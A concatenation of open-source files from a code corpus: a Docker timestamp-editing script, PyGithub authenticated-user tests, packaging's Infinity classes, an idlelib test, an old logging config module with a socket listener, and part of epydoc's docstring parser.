<input name='tags' type='text' value='${figshare_tags}' placeholder='e.g. neuroscience, cognition'><br />
<h3><label>Description</label></h3>
<textarea name='description' placeholder='Please type a description of this file here'>${figshare_desc}</textarea>
</form>
'''
OAUTH_INVALID = 'Your OAuth key for figshare is no longer valid. Please re-authenticate. '
# END MFR MESSAGES
| apache-2.0 |
wallace123/docker-time | docker-time.py | 1 | 1649 | """ Searches docker binaries and edits the timestamp """
import os
import sys
import argparse
import re
from datetime import datetime
ONE_GB = 1024*1024*1024
def readFile(infile):
if os.stat(infile).st_size > ONE_GB:
print "File size too big...exiting"
sys.exit(0)
with open(infile, 'r') as f:
f_chars = f.read()
f.close()
return f_chars
def subTimeStamp(instr):
# Docker timestamp example: 2016-12-16T02:42:17.070078439+00:00
# regExpr timestamp is reduced due to python datetime module
# only going to 6 places in the millisecond field
regExpr = r'2016-\d\d-\d\dT\d\d:\d\d:\d\d\.\d\d\d\d\d\d'
searchObj = re.search(regExpr,
instr,
re.M|re.I)
if searchObj:
print "timestamp found: ", searchObj.group()
else:
print "Timestamp not found"
sys.exit(0)
new_timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
outstr = re.sub(regExpr,
new_timestamp,
instr)
return outstr
def writeFile(outstr, outfile):
with open(outfile, 'w') as f:
f.write(outstr)
f.close()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('infile',
help="Input file to search for timestamp")
parser.add_argument('outfile',
help="Output file with modified timestamp")
args = parser.parse_args()
in_chars = readFile(args.infile)
out_chars = subTimeStamp(in_chars)
writeFile(out_chars, args.outfile)
if __name__ == '__main__':
main()
| gpl-3.0 |
iModels/ffci | github/tests/AuthenticatedUser.py | 1 | 16898 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <[email protected]> #
# Copyright 2012 Zearin <[email protected]> #
# Copyright 2013 Vincent Jacques <[email protected]> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
from . import Framework
import github
import datetime
class AuthenticatedUser(Framework.TestCase):
def setUp(self):
Framework.TestCase.setUp(self)
self.user = self.g.get_user()
def testAttributes(self):
self.assertEqual(self.user.avatar_url, "https://secure.gravatar.com/avatar/b68de5ae38616c296fa345d2b9df2225?d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png")
self.assertEqual(self.user.bio, "")
self.assertEqual(self.user.blog, "http://vincent-jacques.net")
self.assertEqual(self.user.collaborators, 0)
self.assertEqual(self.user.company, "Criteo")
self.assertEqual(self.user.created_at, datetime.datetime(2010, 7, 9, 6, 10, 6))
self.assertEqual(self.user.disk_usage, 16692)
self.assertEqual(self.user.email, "[email protected]")
self.assertEqual(self.user.followers, 13)
self.assertEqual(self.user.following, 24)
self.assertEqual(self.user.gravatar_id, "b68de5ae38616c296fa345d2b9df2225")
self.assertFalse(self.user.hireable)
self.assertEqual(self.user.html_url, "https://github.com/jacquev6")
self.assertEqual(self.user.id, 327146)
self.assertEqual(self.user.location, "Paris, France")
self.assertEqual(self.user.login, "jacquev6")
self.assertEqual(self.user.name, "Vincent Jacques")
self.assertEqual(self.user.owned_private_repos, 5)
self.assertEqual(self.user.plan.name, "micro")
self.assertEqual(self.user.plan.collaborators, 1)
self.assertEqual(self.user.plan.space, 614400)
self.assertEqual(self.user.plan.private_repos, 5)
self.assertEqual(self.user.private_gists, 5)
self.assertEqual(self.user.public_gists, 1)
self.assertEqual(self.user.public_repos, 10)
self.assertEqual(self.user.total_private_repos, 5)
self.assertEqual(self.user.type, "User")
self.assertEqual(self.user.url, "https://api.github.com/users/jacquev6")
def testEditWithoutArguments(self):
self.user.edit()
def testEditWithAllArguments(self):
self.user.edit("Name edited by PyGithub", "Email edited by PyGithub", "Blog edited by PyGithub", "Company edited by PyGithub", "Location edited by PyGithub", True, "Bio edited by PyGithub")
self.assertEqual(self.user.name, "Name edited by PyGithub")
self.assertEqual(self.user.email, "Email edited by PyGithub")
self.assertEqual(self.user.blog, "Blog edited by PyGithub")
self.assertEqual(self.user.company, "Company edited by PyGithub")
self.assertEqual(self.user.location, "Location edited by PyGithub")
self.assertTrue(self.user.hireable)
self.assertEqual(self.user.bio, "Bio edited by PyGithub")
def testEmails(self):
self.assertEqual(self.user.get_emails(), ["[email protected]", "[email protected]"])
self.user.add_to_emails("[email protected]", "[email protected]")
self.assertEqual(self.user.get_emails(), ["[email protected]", "[email protected]", "[email protected]", "[email protected]"])
self.user.remove_from_emails("[email protected]", "[email protected]")
self.assertEqual(self.user.get_emails(), ["[email protected]", "[email protected]"])
def testFollowing(self):
nvie = self.g.get_user("nvie")
self.assertListKeyEqual(self.user.get_following(), lambda u: u.login, ["schacon", "jamis", "chad", "unclebob", "dabrahams", "jnorthrup", "brugidou", "regisb", "walidk", "tanzilli", "fjardon", "r3c", "sdanzan", "vineus", "cjuniet", "gturri", "ant9000", "asquini", "claudyus", "jardon-u", "s-bernard", "kamaradclimber", "Lyloa", "nvie"])
self.assertTrue(self.user.has_in_following(nvie))
self.user.remove_from_following(nvie)
self.assertFalse(self.user.has_in_following(nvie))
self.user.add_to_following(nvie)
self.assertTrue(self.user.has_in_following(nvie))
self.assertListKeyEqual(self.user.get_followers(), lambda u: u.login, ["jnorthrup", "brugidou", "regisb", "walidk", "afzalkhan", "sdanzan", "vineus", "gturri", "fjardon", "cjuniet", "jardon-u", "kamaradclimber", "L42y"])
def testWatching(self):
gitflow = self.g.get_user("nvie").get_repo("gitflow")
self.assertListKeyEqual(self.user.get_watched(), lambda r: r.name, ["git", "boost.php", "capistrano", "boost.perl", "git-subtree", "git-hg", "homebrew", "celtic_knot", "twisted-intro", "markup", "hub", "gitflow", "murder", "boto", "agit", "d3", "pygit2", "git-pulls", "django_mathlatex", "scrumblr", "developer.github.com", "python-github3", "PlantUML", "bootstrap", "drawnby", "django-socketio", "django-realtime", "playground", "BozoCrack", "FatherBeaver", "PyGithub", "django", "django", "TestPyGithub"])
self.assertTrue(self.user.has_in_watched(gitflow))
self.user.remove_from_watched(gitflow)
self.assertFalse(self.user.has_in_watched(gitflow))
self.user.add_to_watched(gitflow)
self.assertTrue(self.user.has_in_watched(gitflow))
def testStarring(self):
gitflow = self.g.get_user("nvie").get_repo("gitflow")
self.assertListKeyEqual(self.user.get_starred(), lambda r: r.name, ["git", "boost.php", "capistrano", "boost.perl", "git-subtree", "git-hg", "homebrew", "celtic_knot", "twisted-intro", "markup", "hub", "gitflow", "murder", "boto", "agit", "d3", "pygit2", "git-pulls", "django_mathlatex", "scrumblr", "developer.github.com", "python-github3", "PlantUML", "bootstrap", "drawnby", "django-socketio", "django-realtime", "playground", "BozoCrack", "FatherBeaver", "amaunet", "django", "django", "moviePlanning", "folly"])
self.assertTrue(self.user.has_in_starred(gitflow))
self.user.remove_from_starred(gitflow)
self.assertFalse(self.user.has_in_starred(gitflow))
self.user.add_to_starred(gitflow)
self.assertTrue(self.user.has_in_starred(gitflow))
def testSubscriptions(self):
gitflow = self.g.get_user("nvie").get_repo("gitflow")
self.assertListKeyEqual(self.user.get_subscriptions(), lambda r: r.name, ["gitflow", "ViDE", "Boost.HierarchicalEnum", "QuadProgMm", "DrawSyntax", "DrawTurksHead", "PrivateStuff", "vincent-jacques.net", "Hacking", "C4Planner", "developer.github.com", "PyGithub", "PyGithub", "django", "CinePlanning", "PyGithub", "PyGithub", "PyGithub", "IpMap", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub"])
self.assertTrue(self.user.has_in_subscriptions(gitflow))
self.user.remove_from_subscriptions(gitflow)
self.assertFalse(self.user.has_in_subscriptions(gitflow))
self.user.add_to_subscriptions(gitflow)
self.assertTrue(self.user.has_in_subscriptions(gitflow))
def testGetAuthorizations(self):
self.assertListKeyEqual(self.user.get_authorizations(), lambda a: a.id, [372294])
def testCreateRepository(self):
repo = self.user.create_repo("TestPyGithub")
self.assertEqual(repo.url, "https://api.github.com/repos/jacquev6/TestPyGithub")
def testCreateRepositoryWithAllArguments(self):
repo = self.user.create_repo("TestPyGithub", "Repo created by PyGithub", "http://foobar.com", private=False, has_issues=False, has_wiki=False, has_downloads=False)
self.assertEqual(repo.url, "https://api.github.com/repos/jacquev6/TestPyGithub")
def testCreateRepositoryWithAutoInit(self):
repo = self.user.create_repo("TestPyGithub", auto_init=True, gitignore_template="Python")
self.assertEqual(repo.url, "https://api.github.com/repos/jacquev6/TestPyGithub")
def testCreateAuthorizationWithoutArguments(self):
authorization = self.user.create_authorization()
self.assertEqual(authorization.id, 372259)
def testCreateAuthorizationWithAllArguments(self):
authorization = self.user.create_authorization(["repo"], "Note created by PyGithub", "http://vincent-jacques.net/PyGithub")
self.assertEqual(authorization.id, 372294)
def testCreateAuthorizationWithClientIdAndSecret(self):
# I don't have a client_id and client_secret so the ReplayData for this test is forged
authorization = self.user.create_authorization(client_id="01234567890123456789", client_secret="0123456789012345678901234567890123456789")
self.assertEqual(authorization.id, 372294)
def testCreateGist(self):
gist = self.user.create_gist(True, {"foobar.txt": github.InputFileContent("File created by PyGithub")}, "Gist created by PyGithub")
self.assertEqual(gist.description, "Gist created by PyGithub")
self.assertEqual(list(gist.files.keys()), ["foobar.txt"])
self.assertEqual(gist.files["foobar.txt"].content, "File created by PyGithub")
def testCreateGistWithoutDescription(self):
gist = self.user.create_gist(True, {"foobar.txt": github.InputFileContent("File created by PyGithub")})
self.assertEqual(gist.description, None)
self.assertEqual(list(gist.files.keys()), ["foobar.txt"])
self.assertEqual(gist.files["foobar.txt"].content, "File created by PyGithub")
def testCreateKey(self):
key = self.user.create_key("Key added through PyGithub", "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA2Mm0RjTNAYFfSCtUpO54usdseroUSIYg5KX4JoseTpqyiB/hqewjYLAdUq/tNIQzrkoEJWSyZrQt0ma7/YCyMYuNGd3DU6q6ZAyBeY3E9RyCiKjO3aTL2VKQGFvBVVmGdxGVSCITRphAcsKc/PF35/fg9XP9S0anMXcEFtdfMHz41SSw+XtE+Vc+6cX9FuI5qUfLGbkv8L1v3g4uw9VXlzq4GfTA+1S7D6mcoGHopAIXFlVr+2RfDKdSURMcB22z41fljO1MW4+zUS/4FyUTpL991es5fcwKXYoiE+x06VJeJJ1Krwx+DZj45uweV6cHXt2JwJEI9fWB6WyBlDejWw== vincent@IDEE")
self.assertEqual(key.id, 2626650)
def testGetEvents(self):
self.assertListKeyBegin(self.user.get_events(), lambda e: e.type, ["PushEvent", "IssuesEvent", "IssueCommentEvent", "PushEvent"])
def testGetOrganizationEvents(self):
self.assertListKeyBegin(self.user.get_organization_events(self.g.get_organization("BeaverSoftware")), lambda e: e.type, ["CreateEvent", "CreateEvent", "PushEvent", "PushEvent"])
def testGetGists(self):
self.assertListKeyEqual(self.user.get_gists(), lambda g: g.id, ["2793505", "2793179", "11cb445f8197e17d303d", "1942384", "dcb7de17e8a52b74541d"])
def testGetStarredGists(self):
self.assertListKeyEqual(self.user.get_starred_gists(), lambda g: g.id, ["1942384", "dcb7de17e8a52b74541d"])
def testGetIssues(self):
self.assertListKeyEqual(self.user.get_issues(), lambda i: (i.id, i.repository.name), [(4639931, "PyGithub"), (4452000, "PyGithub"), (4356743, "PyGithub"), (3716033, "PyGithub"), (3715946, "PyGithub"), (3643837, "PyGithub"), (3628022, "PyGithub"), (3624595, "PyGithub"), (3624570, "PyGithub"), (3624561, "PyGithub"), (3624556, "PyGithub"), (3619973, "PyGithub"), (3527266, "PyGithub"), (3527245, "PyGithub"), (3527231, "PyGithub")])
def testGetIssuesWithAllArguments(self):
requestedByUser = self.user.get_repo("PyGithub").get_label("Requested by user")
issues = self.user.get_issues("assigned", "closed", [requestedByUser], "comments", "asc", datetime.datetime(2012, 5, 28, 23, 0, 0))
self.assertListKeyEqual(issues, lambda i: i.id, [6816576, 8495415, 6889934, 8339699, 8075253, 8033963, 9089893, 9489725, 11746141, 5152384, 5177381, 5783131, 6454054, 6641076, 6653907, 7331214, 9489813, 9776615, 10360280, 4356743, 6583381, 6751469, 8189836, 10758585, 12097154, 12867103, 5191621, 5256315, 6363719, 9209408, 6912733, 9948505, 11503771, 10922412, 11844658, 12566144, 6353712, 9323084, 10379143, 5387373, 12179668, 6911794, 11731917, 6807542, 6780606])
def testGetUserIssues(self):
self.assertListKeyEqual(self.user.get_user_issues(), lambda i: i.id, [14447880, 13505356, 12541184, 10586808, 6741461, 6741457, 6727331, 5641572])
def testGetUserIssuesWithAllArguments(self):
requestedByUser = self.user.get_repo("PyGithub").get_label("Requested by user")
issues = self.user.get_user_issues("assigned", "closed", [requestedByUser], "comments", "asc", datetime.datetime(2012, 5, 28, 23, 0, 0))
self.assertListKeyEqual(issues, lambda i: i.id, [6816576, 8495415, 6889934, 8339699, 8075253, 8033963, 9089893, 9489725, 11746141, 5152384, 5177381, 5783131, 6454054, 6641076, 6653907, 7331214, 9489813, 9776615, 10360280, 4356743, 6583381, 6751469, 8189836, 10758585, 12097154, 12867103, 5191621, 5256315, 6363719, 9209408, 6912733, 9948505, 11503771, 10922412, 11844658, 12566144, 6353712, 9323084, 10379143, 5387373, 12179668, 6911794, 11731917, 6807542, 6780606])
def testGetKeys(self):
self.assertListKeyEqual(self.user.get_keys(), lambda k: k.title, ["vincent@home", "vincent@gandi", "vincent@aws", "vincent@macbook"])
def testGetOrgs(self):
self.assertListKeyEqual(self.user.get_orgs(), lambda o: o.login, ["BeaverSoftware"])
def testGetRepos(self):
self.assertListKeyEqual(self.user.get_repos(), lambda r: r.name, ["TestPyGithub", "django", "PyGithub", "developer.github.com", "acme-public-website", "C4Planner", "Hacking", "vincent-jacques.net", "Contests", "Candidates", "Tests", "DrawTurksHead", "DrawSyntax", "QuadProgMm", "Boost.HierarchicalEnum", "ViDE"])
def testGetReposWithArguments(self):
self.assertListKeyEqual(self.user.get_repos("public", "full_name", "desc"), lambda r: r.name, ["ViDE", "QuadProgMm", "PyGithub", "DrawTurksHead", "DrawSyntax", "django", "developer.github.com", "C4Planner", "Boost.HierarchicalEnum", "acme-public-website"])
def testCreateFork(self):
repo = self.user.create_fork(self.g.get_user("nvie").get_repo("gitflow"))
self.assertEqual(repo.source.full_name, "nvie/gitflow")
def testGetNotification(self):
notification = self.user.get_notification("8406712")
self.assertEqual(notification.id, "8406712")
self.assertEqual(notification.unread, False)
self.assertEqual(notification.reason, "author")
self.assertEqual(notification.subject.title, "Feature/coveralls")
self.assertEqual(notification.subject.type, "PullRequest")
self.assertEqual(notification.repository.id, 8432784)
self.assertEqual(notification.updated_at, datetime.datetime(2013, 3, 15, 5, 43, 11))
self.assertEqual(notification.url, None)
self.assertEqual(notification.subject.url, None)
self.assertEqual(notification.subject.latest_comment_url, None)
def testGetNotifications(self):
self.assertListKeyEqual(self.user.get_notifications(participating=True), lambda n: n.id, ["8406712"])
def testGetNotificationsWithOtherArguments(self):
self.assertListKeyEqual(self.user.get_notifications(all=True), lambda n: n.id, [])
def testGetTeams(self):
self.assertListKeyEqual(self.user.get_teams(), lambda t: t.name, ["Owners", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries"])
| mit |
Distrotech/buck | third-party/py/setuptools/pkg_resources/_vendor/packaging/_structures.py | 906 | 1809 | # Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
class Infinity(object):
def __repr__(self):
return "Infinity"
def __hash__(self):
return hash(repr(self))
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not isinstance(other, self.__class__)
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __neg__(self):
return NegativeInfinity
Infinity = Infinity()
class NegativeInfinity(object):
def __repr__(self):
return "-Infinity"
def __hash__(self):
return hash(repr(self))
def __lt__(self, other):
return True
def __le__(self, other):
return True
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not isinstance(other, self.__class__)
def __gt__(self, other):
return False
def __ge__(self, other):
return False
def __neg__(self):
return Infinity
NegativeInfinity = NegativeInfinity()
| apache-2.0 |
FFMG/myoddweb.piger | monitor/api/python/Python-3.7.2/Lib/idlelib/idle_test/test_delegator.py | 11 | 1567 | "Test delegator, coverage 100%."
from idlelib.delegator import Delegator
import unittest
class DelegatorTest(unittest.TestCase):
def test_mydel(self):
# Test a simple use scenario.
# Initialize an int delegator.
mydel = Delegator(int)
self.assertIs(mydel.delegate, int)
self.assertEqual(mydel._Delegator__cache, set())
# Trying to access a non-attribute of int fails.
self.assertRaises(AttributeError, mydel.__getattr__, 'xyz')
# Add real int attribute 'bit_length' by accessing it.
bl = mydel.bit_length
self.assertIs(bl, int.bit_length)
self.assertIs(mydel.__dict__['bit_length'], int.bit_length)
self.assertEqual(mydel._Delegator__cache, {'bit_length'})
# Add attribute 'numerator'.
mydel.numerator
self.assertEqual(mydel._Delegator__cache, {'bit_length', 'numerator'})
# Delete 'numerator'.
del mydel.numerator
self.assertNotIn('numerator', mydel.__dict__)
# The current implementation leaves it in the name cache.
# self.assertIn('numerator', mydel._Delegator__cache)
# However, this is not required and not part of the specification
# Change delegate to float, first resetting the attributes.
mydel.setdelegate(float) # calls resetcache
self.assertNotIn('bit_length', mydel.__dict__)
self.assertEqual(mydel._Delegator__cache, set())
self.assertIs(mydel.delegate, float)
if __name__ == '__main__':
unittest.main(verbosity=2, exit=2)
| gpl-2.0 |
sudkannan/xen-hv | tools/python/logging/logging-0.4.9.2/logging/config.py | 42 | 11911 | # Copyright 2001-2004 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Configuration functions for the logging package for Python. The core package
is based on PEP 282 and comments thereto in comp.lang.python, and influenced
by Apache's log4j system.
Should work under Python versions >= 1.5.2, except that source line
information is not available unless 'sys._getframe()' is.
Copyright (C) 2001-2004 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, logging, logging.handlers, string, thread, threading, socket, struct, os
from SocketServer import ThreadingTCPServer, StreamRequestHandler
DEFAULT_LOGGING_CONFIG_PORT = 9030
if sys.platform == "win32":
RESET_ERROR = 10054 #WSAECONNRESET
else:
RESET_ERROR = 104 #ECONNRESET
#
# The following code implements a socket listener for on-the-fly
# reconfiguration of logging.
#
# _listener holds the server object doing the listening
_listener = None
def fileConfig(fname, defaults=None):
"""
Read the logging configuration from a ConfigParser-format file.
This can be called several times from an application, allowing an end user
the ability to select from various pre-canned configurations (if the
developer provides a mechanism to present the choices and load the chosen
configuration).
In versions of ConfigParser which have the readfp method [typically
shipped in 2.x versions of Python], you can pass in a file-like object
rather than a filename, in which case the file-like object will be read
using readfp.
"""
import ConfigParser
cp = ConfigParser.ConfigParser(defaults)
if hasattr(cp, 'readfp') and hasattr(fname, 'readline'):
cp.readfp(fname)
else:
cp.read(fname)
#first, do the formatters...
flist = cp.get("formatters", "keys")
if len(flist):
flist = string.split(flist, ",")
formatters = {}
for form in flist:
sectname = "formatter_%s" % form
opts = cp.options(sectname)
if "format" in opts:
fs = cp.get(sectname, "format", 1)
else:
fs = None
if "datefmt" in opts:
dfs = cp.get(sectname, "datefmt", 1)
else:
dfs = None
f = logging.Formatter(fs, dfs)
formatters[form] = f
#next, do the handlers...
#critical section...
logging._acquireLock()
try:
try:
#first, lose the existing handlers...
logging._handlers.clear()
#now set up the new ones...
hlist = cp.get("handlers", "keys")
if len(hlist):
hlist = string.split(hlist, ",")
handlers = {}
fixups = [] #for inter-handler references
for hand in hlist:
sectname = "handler_%s" % hand
klass = cp.get(sectname, "class")
opts = cp.options(sectname)
if "formatter" in opts:
fmt = cp.get(sectname, "formatter")
else:
fmt = ""
klass = eval(klass, vars(logging))
args = cp.get(sectname, "args")
args = eval(args, vars(logging))
h = apply(klass, args)
if "level" in opts:
level = cp.get(sectname, "level")
h.setLevel(logging._levelNames[level])
if len(fmt):
h.setFormatter(formatters[fmt])
#temporary hack for FileHandler and MemoryHandler.
if klass == logging.handlers.MemoryHandler:
if "target" in opts:
target = cp.get(sectname,"target")
else:
target = ""
if len(target): #the target handler may not be loaded yet, so keep for later...
fixups.append((h, target))
handlers[hand] = h
#now all handlers are loaded, fixup inter-handler references...
for fixup in fixups:
h = fixup[0]
t = fixup[1]
h.setTarget(handlers[t])
#at last, the loggers...first the root...
llist = cp.get("loggers", "keys")
llist = string.split(llist, ",")
llist.remove("root")
sectname = "logger_root"
root = logging.root
log = root
opts = cp.options(sectname)
if "level" in opts:
level = cp.get(sectname, "level")
log.setLevel(logging._levelNames[level])
for h in root.handlers[:]:
root.removeHandler(h)
hlist = cp.get(sectname, "handlers")
if len(hlist):
hlist = string.split(hlist, ",")
for hand in hlist:
log.addHandler(handlers[hand])
#and now the others...
#we don't want to lose the existing loggers,
#since other threads may have pointers to them.
#existing is set to contain all existing loggers,
#and as we go through the new configuration we
#remove any which are configured. At the end,
#what's left in existing is the set of loggers
#which were in the previous configuration but
#which are not in the new configuration.
existing = root.manager.loggerDict.keys()
#now set up the new ones...
for log in llist:
sectname = "logger_%s" % log
qn = cp.get(sectname, "qualname")
opts = cp.options(sectname)
if "propagate" in opts:
propagate = cp.getint(sectname, "propagate")
else:
propagate = 1
logger = logging.getLogger(qn)
if qn in existing:
existing.remove(qn)
if "level" in opts:
level = cp.get(sectname, "level")
logger.setLevel(logging._levelNames[level])
for h in logger.handlers[:]:
logger.removeHandler(h)
logger.propagate = propagate
logger.disabled = 0
hlist = cp.get(sectname, "handlers")
if len(hlist):
hlist = string.split(hlist, ",")
for hand in hlist:
logger.addHandler(handlers[hand])
#Disable any old loggers. There's no point deleting
#them as other threads may continue to hold references
#and by disabling them, you stop them doing any logging.
for log in existing:
root.manager.loggerDict[log].disabled = 1
except:
import traceback
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr)
del ei
finally:
logging._releaseLock()
def listen(port=DEFAULT_LOGGING_CONFIG_PORT):
"""
Start up a socket server on the specified port, and listen for new
configurations.
These will be sent as a file suitable for processing by fileConfig().
Returns a Thread object on which you can call start() to start the server,
and which you can join() when appropriate. To stop the server, call
stopListening().
"""
if not thread:
raise NotImplementedError, "listen() needs threading to work"
class ConfigStreamHandler(StreamRequestHandler):
"""
Handler for a logging configuration request.
It expects a completely new logging configuration and uses fileConfig
to install it.
"""
def handle(self):
"""
Handle a request.
Each request is expected to be a 4-byte length,
followed by the config file. Uses fileConfig() to do the
grunt work.
"""
import tempfile
try:
conn = self.connection
chunk = conn.recv(4)
if len(chunk) == 4:
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
#Apply new configuration. We'd like to be able to
#create a StringIO and pass that in, but unfortunately
#1.5.2 ConfigParser does not support reading file
#objects, only actual files. So we create a temporary
#file and remove it later.
file = tempfile.mktemp(".ini")
f = open(file, "w")
f.write(chunk)
f.close()
fileConfig(file)
os.remove(file)
except socket.error, e:
if type(e.args) != types.TupleType:
raise
else:
errcode = e.args[0]
if errcode != RESET_ERROR:
raise
class ConfigSocketReceiver(ThreadingTCPServer):
"""
A simple TCP socket-based logging config receiver.
"""
allow_reuse_address = 1
def __init__(self, host='localhost', port=DEFAULT_LOGGING_CONFIG_PORT,
handler=None):
ThreadingTCPServer.__init__(self, (host, port), handler)
logging._acquireLock()
self.abort = 0
logging._releaseLock()
self.timeout = 1
def serve_until_stopped(self):
import select
abort = 0
while not abort:
rd, wr, ex = select.select([self.socket.fileno()],
[], [],
self.timeout)
if rd:
self.handle_request()
logging._acquireLock()
abort = self.abort
logging._releaseLock()
def serve(rcvr, hdlr, port):
server = rcvr(port=port, handler=hdlr)
global _listener
logging._acquireLock()
_listener = server
logging._releaseLock()
server.serve_until_stopped()
return threading.Thread(target=serve,
args=(ConfigSocketReceiver,
ConfigStreamHandler, port))
def stopListening():
"""
Stop the listening server which was created with a call to listen().
"""
global _listener
if _listener:
logging._acquireLock()
_listener.abort = 1
_listener = None
logging._releaseLock()
| gpl-2.0 |
da1z/intellij-community | python/helpers/epydoc/docstringparser.py | 91 | 45421 | # epydoc -- Docstring processing
#
# Copyright (C) 2005 Edward Loper
# Author: Edward Loper <[email protected]>
# URL: <http://epydoc.sf.net>
#
# $Id: docstringparser.py 1689 2008-01-30 17:01:02Z edloper $
"""
Parse docstrings and handle any fields it defines, such as C{@type}
and C{@author}. Fields are used to describe specific information
about an object. There are two classes of fields: X{simple fields}
and X{special fields}.
Simple fields are fields that get stored directly in an C{APIDoc}'s
metadata dictionary, without any special processing. The set of
simple fields is defined by the list L{STANDARD_FIELDS}, whose
elements are L{DocstringField}s.
Special fields are fields that perform some sort of processing on the
C{APIDoc}, or add information to attributes other than the metadata
dictionary. Special fields are are handled by field handler
functions, which are registered using L{register_field_handler}.
"""
__docformat__ = 'epytext en'
######################################################################
## Imports
######################################################################
import re, sys
from epydoc import markup
from epydoc.markup import epytext
from epydoc.apidoc import *
from epydoc.docintrospecter import introspect_docstring_lineno
from epydoc.util import py_src_filename
from epydoc import log
import epydoc.docparser
import __builtin__, exceptions
######################################################################
# Docstring Fields
######################################################################
class DocstringField:
"""
A simple docstring field, which can be used to describe specific
information about an object, such as its author or its version.
Simple docstring fields are fields that take no arguments, and
are displayed as simple sections.
@ivar tags: The set of tags that can be used to identify this
field.
@ivar singular: The label that should be used to identify this
field in the output, if the field contains one value.
@ivar plural: The label that should be used to identify this
field in the output, if the field contains multiple values.
@ivar short: If true, then multiple values should be combined
into a single comma-delimited list. If false, then
multiple values should be listed separately in a bulleted
list.
@ivar multivalue: If true, then multiple values may be given
for this field; if false, then this field can only take a
single value, and a warning should be issued if it is
redefined.
@ivar takes_arg: If true, then this field expects an argument;
and a separate field section will be constructed for each
argument value. The label (and plural label) should include
a '%s' to mark where the argument's string rep should be
added.
"""
def __init__(self, tags, label, plural=None,
short=0, multivalue=1, takes_arg=0,
varnames=None):
if type(tags) in (list, tuple):
self.tags = tuple(tags)
elif type(tags) is str:
self.tags = (tags,)
else: raise TypeError('Bad tags: %s' % tags)
self.singular = label
if plural is None: self.plural = label
else: self.plural = plural
self.multivalue = multivalue
self.short = short
self.takes_arg = takes_arg
self.varnames = varnames or []
def __cmp__(self, other):
if not isinstance(other, DocstringField): return -1
return cmp(self.tags, other.tags)
def __hash__(self):
return hash(self.tags)
def __repr__(self):
return '<Field: %s>' % self.tags[0]
STANDARD_FIELDS = [
#: A list of the standard simple fields accepted by epydoc. This
#: list can be augmented at run-time by a docstring with the special
#: C{@deffield} field. The order in which fields are listed here
#: determines the order in which they will be displayed in the
#: output.
# If it's deprecated, put that first.
DocstringField(['deprecated', 'depreciated'],
'Deprecated', multivalue=0, varnames=['__deprecated__']),
# Status info
DocstringField(['version'], 'Version', multivalue=0,
varnames=['__version__']),
DocstringField(['date'], 'Date', multivalue=0,
varnames=['__date__']),
DocstringField(['status'], 'Status', multivalue=0),
# Bibliographic Info
DocstringField(['author', 'authors'], 'Author', 'Authors', short=1,
varnames=['__author__', '__authors__']),
DocstringField(['contact'], 'Contact', 'Contacts', short=1,
varnames=['__contact__']),
DocstringField(['organization', 'org'],
'Organization', 'Organizations'),
DocstringField(['copyright', '(c)'], 'Copyright', multivalue=0,
varnames=['__copyright__']),
DocstringField(['license'], 'License', multivalue=0,
varnames=['__license__']),
# Various warnings etc.
DocstringField(['bug'], 'Bug', 'Bugs'),
DocstringField(['warning', 'warn'], 'Warning', 'Warnings'),
DocstringField(['attention'], 'Attention'),
DocstringField(['note'], 'Note', 'Notes'),
# Formal conditions
DocstringField(['requires', 'require', 'requirement'], 'Requires'),
DocstringField(['precondition', 'precond'],
'Precondition', 'Preconditions'),
DocstringField(['postcondition', 'postcond'],
'Postcondition', 'Postconditions'),
DocstringField(['invariant'], 'Invariant'),
# When was it introduced (version # or date)
